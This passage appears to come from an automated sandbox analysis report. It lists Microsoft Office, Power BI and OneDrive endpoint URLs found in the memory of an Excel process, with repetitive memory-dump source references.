    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticatedk
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removeSN
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/removei
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://analysis.windows.net/powerbi/api8
    Source: EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmpString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspee
    Source: EXCEL.EXE, EXCEL.EXE, 00000000.00000003.656171574.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656420136.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.887182746.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829507142.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.975433720.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843028954.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712989878.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843831700.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844821689.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728814839.0000000012A88000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.791886378.0000000012A88000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.aadrm.com
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.aadrm.com/
    Source: EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656113776.0000000012A2F000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmpString found in binary or memory: https://api.addihO
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.omex.office.net/appstate/queryEX
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.office.com/app/queryl
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplatebW
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.cortana.ai
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.diagnostics.office.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.diagnostics.office.comA
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
    Source: EXCEL.EXE, 00000000.00000002.982062545.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792419093.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656095068.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.886851258.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829883976.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.842980218.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728506712.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843787373.0000000012A13000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712940774.0000000012A23000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.847529633.0000000012A13000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.microsoftstream.com/api/
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.microsoftstream.com/api/Wk
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.office.net
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net4
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://api.office.net9
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netG
    Source: EXCEL.EXE, 00000000.00000002.981660434.00000000128EC000.00000004.00000001.sdmpString found in binary or memory: https://api.office.netT
    Source: EXCEL.EXE, 00000000.00000003.656095068.0000000012A13000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.onedrive.com
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.onedrive.comce
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmp, 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasetsY
    Source: 630E636C-6B0C-44EA-BF33-295CC8DCC16C.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
    Source: EXCEL.EXE, 00000000.00000003.793618295.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.983087003.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.712879748.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.829418117.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656628398.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.656351253.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.844070824.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.843276855.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.728748048.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.792166037.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.845405435.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.885769597.0000000012BE4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.729296626.0000000012BE4000.00000004.00000001.sdmpString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groupsH
